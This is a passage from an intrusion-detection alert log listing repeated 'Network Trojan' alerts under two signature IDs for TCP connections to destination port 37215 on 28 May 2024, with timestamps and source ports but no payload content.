            Timestamp:05/28/24-09:56:46.622283
            SID:2835222
            Source Port:36888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914913
            SID:2829579
            Source Port:57794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470814
            SID:2835222
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764964
            SID:2835222
            Source Port:51040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861780
            SID:2829579
            Source Port:59728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952623
            SID:2829579
            Source Port:54332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152981
            SID:2835222
            Source Port:53678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.548639
            SID:2829579
            Source Port:58824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774141
            SID:2835222
            Source Port:34262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868290
            SID:2835222
            Source Port:50332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885534
            SID:2835222
            Source Port:39378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.566000
            SID:2829579
            Source Port:36414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936020
            SID:2829579
            Source Port:60754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.829845
            SID:2835222
            Source Port:51340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298478
            SID:2835222
            Source Port:56596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.677499
            SID:2829579
            Source Port:52530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899470
            SID:2829579
            Source Port:57494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045366
            SID:2835222
            Source Port:34922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777416
            SID:2835222
            Source Port:60462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710064
            SID:2829579
            Source Port:57556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515813
            SID:2835222
            Source Port:38756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.409468
            SID:2829579
            Source Port:32794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.001438
            SID:2835222
            Source Port:35770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442956
            SID:2835222
            Source Port:56894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929930
            SID:2835222
            Source Port:56816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815165
            SID:2829579
            Source Port:49782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344875
            SID:2835222
            Source Port:58068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.314422
            SID:2835222
            Source Port:39486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.266273
            SID:2835222
            Source Port:51776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993272
            SID:2829579
            Source Port:56068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.230880
            SID:2829579
            Source Port:43568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.902150
            SID:2829579
            Source Port:60906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767412
            SID:2829579
            Source Port:57146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990276
            SID:2829579
            Source Port:47364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563348
            SID:2829579
            Source Port:49124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423199
            SID:2829579
            Source Port:32784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412665
            SID:2835222
            Source Port:41936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322575
            SID:2835222
            Source Port:50734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.822860
            SID:2829579
            Source Port:37404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752931
            SID:2829579
            Source Port:43818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962983
            SID:2829579
            Source Port:47956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321516
            SID:2835222
            Source Port:56968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.946852
            SID:2829579
            Source Port:42794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863117
            SID:2835222
            Source Port:60306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828070
            SID:2835222
            Source Port:57736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817611
            SID:2835222
            Source Port:34698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553090
            SID:2835222
            Source Port:54096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707562
            SID:2835222
            Source Port:51096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020413
            SID:2835222
            Source Port:37968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919680
            SID:2829579
            Source Port:35300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847682
            SID:2829579
            Source Port:58530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858340
            SID:2829579
            Source Port:40722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304890
            SID:2835222
            Source Port:47626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276353
            SID:2835222
            Source Port:33958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.347887
            SID:2829579
            Source Port:58262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778839
            SID:2835222
            Source Port:34042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955411
            SID:2835222
            Source Port:45688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386461
            SID:2829579
            Source Port:38602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.724756
            SID:2835222
            Source Port:51834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061205
            SID:2835222
            Source Port:49016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323212
            SID:2829579
            Source Port:57606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848373
            SID:2835222
            Source Port:36274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327566
            SID:2829579
            Source Port:54394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811029
            SID:2835222
            Source Port:55086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045742
            SID:2829579
            Source Port:38250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878646
            SID:2829579
            Source Port:40228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930186
            SID:2835222
            Source Port:41680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789495
            SID:2829579
            Source Port:54088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837589
            SID:2835222
            Source Port:56192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.794087
            SID:2835222
            Source Port:45080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892548
            SID:2835222
            Source Port:41092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.073338
            SID:2829579
            Source Port:44108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.822947
            SID:2835222
            Source Port:35912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909596
            SID:2835222
            Source Port:40118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488860
            SID:2835222
            Source Port:37952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.999386
            SID:2835222
            Source Port:33088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290522
            SID:2835222
            Source Port:33932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.483972
            SID:2835222
            Source Port:57838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.733222
            SID:2829579
            Source Port:40778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626640
            SID:2835222
            Source Port:52914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.970012
            SID:2835222
            Source Port:37130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675543
            SID:2835222
            Source Port:48500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604926
            SID:2829579
            Source Port:57722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.549953
            SID:2829579
            Source Port:43796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.651801
            SID:2829579
            Source Port:46690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775747
            SID:2829579
            Source Port:43710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849647
            SID:2829579
            Source Port:57758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931804
            SID:2829579
            Source Port:48430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930443
            SID:2835222
            Source Port:44822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771302
            SID:2829579
            Source Port:38820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894291
            SID:2829579
            Source Port:57418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806399
            SID:2829579
            Source Port:39398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792488
            SID:2835222
            Source Port:45864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.994366
            SID:2835222
            Source Port:44770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318171
            SID:2835222
            Source Port:33948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834368
            SID:2835222
            Source Port:51336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810338
            SID:2835222
            Source Port:43254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953035
            SID:2835222
            Source Port:43576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957047
            SID:2829579
            Source Port:55204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042618
            SID:2829579
            Source Port:44758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990770
            SID:2829579
            Source Port:40910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854160
            SID:2829579
            Source Port:34008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899902
            SID:2829579
            Source Port:56796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506727
            SID:2835222
            Source Port:48270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.486096
            SID:2835222
            Source Port:43498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485622
            SID:2829579
            Source Port:38458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851110
            SID:2829579
            Source Port:37648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953485
            SID:2835222
            Source Port:50478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712203
            SID:2835222
            Source Port:58426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020389
            SID:2835222
            Source Port:47318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605154
            SID:2829579
            Source Port:49356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058158
            SID:2835222
            Source Port:34998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922694
            SID:2835222
            Source Port:52160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871280
            SID:2829579
            Source Port:54302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790098
            SID:2835222
            Source Port:60966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052490
            SID:2829579
            Source Port:56002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261695
            SID:2829579
            Source Port:58120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584391
            SID:2835222
            Source Port:36914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856405
            SID:2835222
            Source Port:55456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.975193
            SID:2829579
            Source Port:37880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.847120
            SID:2829579
            Source Port:41130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737210
            SID:2835222
            Source Port:47816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919829
            SID:2835222
            Source Port:48486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746019
            SID:2835222
            Source Port:57852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746439
            SID:2829579
            Source Port:50718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804756
            SID:2835222
            Source Port:37002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.071227
            SID:2829579
            Source Port:59998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792529
            SID:2835222
            Source Port:45266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005442
            SID:2835222
            Source Port:51742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326905
            SID:2829579
            Source Port:39620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.041132
            SID:2829579
            Source Port:38756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988154
            SID:2835222
            Source Port:54032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505830
            SID:2835222
            Source Port:43338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371384
            SID:2829579
            Source Port:39102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568448
            SID:2829579
            Source Port:37922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.645872
            SID:2835222
            Source Port:43852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937400
            SID:2835222
            Source Port:56838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790554
            SID:2835222
            Source Port:36074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862918
            SID:2829579
            Source Port:57122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804665
            SID:2829579
            Source Port:36300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573705
            SID:2835222
            Source Port:33768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.030986
            SID:2829579
            Source Port:45834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.463569
            SID:2835222
            Source Port:43792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.798299
            SID:2835222
            Source Port:57212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878686
            SID:2835222
            Source Port:38644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001057
            SID:2829579
            Source Port:59422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648517
            SID:2835222
            Source Port:49486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.649199
            SID:2835222
            Source Port:49498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837132
            SID:2835222
            Source Port:58360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005190
            SID:2829579
            Source Port:60110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388757
            SID:2835222
            Source Port:46420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716232
            SID:2829579
            Source Port:56360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901421
            SID:2835222
            Source Port:52506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310488
            SID:2829579
            Source Port:39096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956400
            SID:2835222
            Source Port:60886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728302
            SID:2835222
            Source Port:33656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282833
            SID:2835222
            Source Port:58540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863197
            SID:2835222
            Source Port:55646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754925
            SID:2829579
            Source Port:32884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843006
            SID:2829579
            Source Port:60276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321350
            SID:2835222
            Source Port:33302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923885
            SID:2829579
            Source Port:33200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.640164
            SID:2829579
            Source Port:38108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861714
            SID:2835222
            Source Port:38272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300079
            SID:2835222
            Source Port:51592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.753826
            SID:2829579
            Source Port:37384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.356721
            SID:2835222
            Source Port:56262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857747
            SID:2835222
            Source Port:36656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309613
            SID:2835222
            Source Port:51592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326217
            SID:2835222
            Source Port:59068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742259
            SID:2829579
            Source Port:34170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565011
            SID:2835222
            Source Port:56514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635119
            SID:2835222
            Source Port:39664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279864
            SID:2835222
            Source Port:36672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572080
            SID:2835222
            Source Port:38072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.581998
            SID:2829579
            Source Port:33010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765625
            SID:2835222
            Source Port:55208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.625897
            SID:2835222
            Source Port:39586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.753859
            SID:2829579
            Source Port:56740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756899
            SID:2829579
            Source Port:53366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717157
            SID:2829579
            Source Port:47928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754903
            SID:2835222
            Source Port:41986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919489
            SID:2835222
            Source Port:59454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.784675
            SID:2835222
            Source Port:59650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776655
            SID:2835222
            Source Port:50374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.767709
            SID:2835222
            Source Port:56326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808756
            SID:2829579
            Source Port:56042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998890
            SID:2835222
            Source Port:42584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.831528
            SID:2829579
            Source Port:41230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251916
            SID:2835222
            Source Port:60060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870209
            SID:2835222
            Source Port:59370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079385
            SID:2835222
            Source Port:56660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.019083
            SID:2829579
            Source Port:40720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923503
            SID:2835222
            Source Port:41024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.879987
            SID:2835222
            Source Port:47092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912055
            SID:2835222
            Source Port:37224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.836065
            SID:2829579
            Source Port:44986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697228
